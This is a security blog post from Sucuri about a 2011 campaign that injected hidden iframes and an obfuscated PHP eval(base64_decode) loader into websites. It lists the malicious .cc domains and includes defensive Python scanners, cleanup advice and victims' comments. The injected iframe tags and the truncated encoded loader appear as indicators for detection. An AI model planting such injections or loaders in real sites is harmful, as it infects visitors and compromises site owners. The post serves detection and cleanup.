Sucuri Blog

The attack from the .cc’s domains

February 25, 2011, by David Dede


Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

This is how it looks on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width="1" height="1">

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width="1" height="1">

The number of domains used in this attack is large and only a few of them are blacklisted by Google, but we have identified at least the following:

berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

They change quite often, but on a hacked site the signs are the same: redirects to malicious .cc sites and the following PHP code added to index.php (along with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…
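The two indicators above, the hidden 1x1 iframe pointing at a .co.cc/.vv.cc/.cz.cc host and the eval(base64_decode("...")) line prepended to index.php, can be located across a web root with the following script. It is an added example and not Sucuri's scanner; the hostnames it knows come from the list in this post, the sample files it writes are constructed, and the base64 payload it embeds is a placeholder prologue modelled on the decoded sample (error_reporting(0) followed by a $bot flag), not the real script. It also decodes the blob's prefix so a triager can see what it starts with before deleting it; the post's fragment contains stray dots, which the decoder strips.

```python
"""Scan a web root for the .cc iframe / eval(base64_decode()) injection.

Added example, not Sucuri's scanner: flags hidden 1x1 iframes that point at a
.co.cc/.vv.cc/.cz.cc host (or at a host from the post's list) and PHP files
that carry eval(base64_decode("...")), decoding the blob's prefix so the
triager can see what it starts with before removing it.
"""
import base64
import binascii
import os
import re
import tempfile

# A few of the hostnames listed in the post; extend from the full list.
KNOWN_BAD_HOSTS = {"hgerwhu45.co.cc", "gqgqhfdjdh.co.cc", "burifym.cz.cc", "maridora.vv.cc"}
CAMPAIGN_SUFFIXES = (".co.cc", ".vv.cc", ".cz.cc")

IFRAME_RE = re.compile(r'<iframe[^>]*src=["\']?https?://([^/"\'\s>]+)[^>]*>', re.IGNORECASE)
# width/height of exactly 1 (quoted or not); the lookahead rejects width="10".
SIZE_RE = re.compile(r'(width|height)\s*=\s*["\']?1(?![0-9])', re.IGNORECASE)
EVAL_B64_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([^"\']+)["\']', re.IGNORECASE)
NOT_B64_RE = re.compile(r'[^A-Za-z0-9+/=]')


def decode_prefix(blob, limit=64):
    """Decode a base64 blob that may be dot-broken (as in the post's sample) or
    truncated, returning up to `limit` characters of the result as text."""
    clean = NOT_B64_RE.sub("", blob).rstrip("=")
    if len(clean) % 4 == 1:      # a lone trailing sextet cannot form a byte
        clean = clean[:-1]
    clean += "=" * (-len(clean) % 4)
    try:
        raw = base64.b64decode(clean, validate=True)
    except binascii.Error:
        return ""
    return raw.decode("latin-1")[:limit]


def scan_text(text):
    """Return (kind, detail) findings for one file's contents."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag, host = m.group(0), m.group(1).lower()
        hidden = len(SIZE_RE.findall(tag)) == 2          # both width and height are 1
        if host in KNOWN_BAD_HOSTS or (host.endswith(CAMPAIGN_SUFFIXES) and hidden):
            findings.append(("iframe", host))
    for m in EVAL_B64_RE.finditer(text):
        findings.append(("eval_base64", decode_prefix(m.group(1))))
    return findings


def scan_tree(root):
    """Scan every .php/.html/.htm file under root; map relative path -> findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".php", ".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed prologue modelled on the post's decoded sample; the real script
# goes on to filter by User-Agent and is deliberately not reproduced here.
SAMPLE_PAYLOAD = b"error_reporting(0);\r\n$bot = FALSE ;\r\n"


def build_sample_tree():
    """Write a throwaway web root: one clean file, two infected ones (constructed)."""
    root = tempfile.mkdtemp(prefix="ccscan_")
    blob = base64.b64encode(SAMPLE_PAYLOAD).decode()
    blob = blob[:10] + "." + blob[10:]      # mimic the dot-broken blob in the post
    iframe = '<iframe src="http://hgerwhu45.co.cc/PLACEHOLDER" width="1" height="1"></iframe>'
    files = {
        "index.php": '<?php eval ( base64_decode("%s")); ?>\n<html>%s</html>\n' % (blob, iframe),
        "blog/index.html": "<html><body>Hello</body>%s</html>\n" % iframe,
        "wp-content/plugins/hello.php": "<?php echo 'clean'; ?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_sample_tree()).items()):
        for kind, detail in hits:
            print("%s: %s -> %r" % (path, kind, detail))
```

Point scan_tree() at the real document root instead of the sample tree; a file flagged for eval_base64 whose decoded prefix begins with error_reporting(0); matches the sample in this post, while an unfamiliar prefix deserves a look before you assume it is the same infection.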

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard: remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn't add). If you need help doing that (or need someone to do it for you), we offer website malware removal / clean-up services.
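The "check for backdoors (files that you didn't add)" step is the one people struggle with, since a reinfected index.php means something else on the host is still writing it. One systematic way to do it is to compare the live tree against a pristine copy of the same application version, file by file. The script below is an added example, not a Sucuri tool; the directory layout, the plugin name and the dropped .exe are constructed samples, and the tampered index.php uses a placeholder in place of a real payload.

```python
"""Compare a live site tree against a pristine copy of the same application.

Added example, not Sucuri's tool: hashes every file under both roots and
reports files the clean copy does not ship (candidate backdoors, such as an
executable dropped into a plugin folder), shipped files whose content differs,
and shipped files that are missing. All paths and contents are constructed.
"""
import hashlib
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file, read in chunks so large uploads are not slurped."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def index_tree(root):
    """Map every file's /-separated relative path to its digest."""
    index = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            index[rel] = file_digest(path)
    return index


def compare_trees(live_root, pristine_root):
    """Return sorted lists of added, modified and missing files (relative paths)."""
    live, pristine = index_tree(live_root), index_tree(pristine_root)
    return {
        "added": sorted(p for p in live if p not in pristine),
        "modified": sorted(p for p in live if p in pristine and live[p] != pristine[p]),
        "missing": sorted(p for p in pristine if p not in live),
    }


def write_files(root, files):
    """Materialise a {relative path: bytes} mapping under root."""
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)


def build_sample_trees():
    """Constructed pristine install and a live copy showing the post's symptoms:
    a tampered index.php and an executable dropped into a plugin directory."""
    pristine = {
        "index.php": b"<?php require 'wp-blog-header.php'; ?>\n",
        "wp-blog-header.php": b"<?php // shipped file ?>\n",
        "wp-content/plugins/example-plugin/example-plugin.php": b"<?php // plugin ?>\n",
    }
    live = dict(pristine)
    # Injected prologue with a placeholder blob, prepended as in the post.
    live["index.php"] = b'<?php eval ( base64_decode("PLACEHOLDER")); ?>\n' + pristine["index.php"]
    # Constructed stand-in for an executable named after its plugin folder.
    live["wp-content/plugins/example-plugin/example-plugin.exe"] = b"MZ...constructed..."
    # Owner content that a clean install never ships but is legitimate.
    live["wp-content/uploads/2011/02/photo.jpg"] = b"legitimate owner-added file"
    live_root = tempfile.mkdtemp(prefix="live_")
    pristine_root = tempfile.mkdtemp(prefix="pristine_")
    write_files(live_root, live)
    write_files(pristine_root, pristine)
    return live_root, pristine_root


if __name__ == "__main__":
    live_root, pristine_root = build_sample_trees()
    for kind, paths in compare_trees(live_root, pristine_root).items():
        print("%s: %s" % (kind, ", ".join(paths) or "-"))
```

The pristine copy must be the same application and version as the live site (a fresh download, unpacked somewhere the web server cannot reach). Everything under "added" needs a human decision: uploads, themes and plugins you installed are expected there, while a PHP or executable file in a directory that should only hold shipped code is exactly the kind of thing to examine and remove. Run the comparison again after cleaning; if index.php shows up under "modified" a few hours later, the writer is still on the host.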

We will post more details /updates as we learn more.


Categories: Website Malware Infections, WordPress Security
Tags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Regina Smola

    February 26, 2011

    Thanks for posting the information.

    I’m seeing several sites with this same issue. I found a couple of nasty trojan horse backdoor executable programs inside various WordPress plugin folders. Example: wp-content/plugins/XML-sitemap/XML-sitemap.exe. It seems that this malware is generating .exe (backdoors) using directory names. Yikes!

  2. Air360

    February 27, 2011

    Thanks for posting this… I have had this attack on EVERY single site of mine… The problem I’m seeing, though, is that even after deleting the code, in about an hour it comes back to every site! I was simply replacing the index.php with a clean one from a clean WordPress install.
    I will now go look at my plugins, as Regina says there are some backdoors apparently.

  3. Bogdan

    March 2, 2011

    I can’t seem to find the backdoor (searched for .exe, .old, .bak files; also searched plugins folders and uploads folders). Once I clean the files, in several hours it gets back. It only infects index.php and index.html, basically all index files. Anyone found the form of the backdoor so far?
    I’ve changed the passwords and it doesn’t seem to be modified via FTP, since the modification date of the index.php files remains the same old one even after infection. It must be a WordPress hack.
    Thanks

  4. Air360

    March 2, 2011

    I have not found it either. If you have multiple sites on one server, make sure it didn’t infect another site as the host and then spread across your server’s sites. I’m thinking it could be somewhere in MySQL. What I am planning on doing tonight is to set up a brand new subdomain and put a brand new clean WordPress on it and nothing else, make sure not to visit it at all, and then monitor the source code; once it updates with the malware, go and look at the logs and look at all the files and try and see if I can find anything in the log and any other files that were modified or messed with. Part of the problem I am having is the sites I have on my server are all developed sites… so there is content all over the database and in the directories… so it’s hard to know what’s “wrong” and what’s still legit… so hopefully this clean test site I “hope” gets infected will help narrow it down.

  5. Creatorul

    March 2, 2011

    This virus is way too good. I’ve pulled my hair out, but I can’t give up. Going to disable the sites one by one and see which ones have the backdoor. If the virus doesn’t get back, then it means that’s the site with the backdoor. Have you noticed any pattern in making it get back? Seems to get back every 2-3 hours after I remove it.

  6. MobileSnap.com

    March 5, 2011

    I just had the same thing happen to my sites. All of my WORDPRESS sites have the .cc URLs with the iframe/eval/base64 code in the index.php. I find it crazy to believe that one older version of WordPress would allow access to my server and other directories. Is this what happened? Some non-WordPress sites also have the iframe hack in them, while others do not. How do I clean it out? I’m considering just moving some over to another new fresh server. I think deleting everything is the way to go.
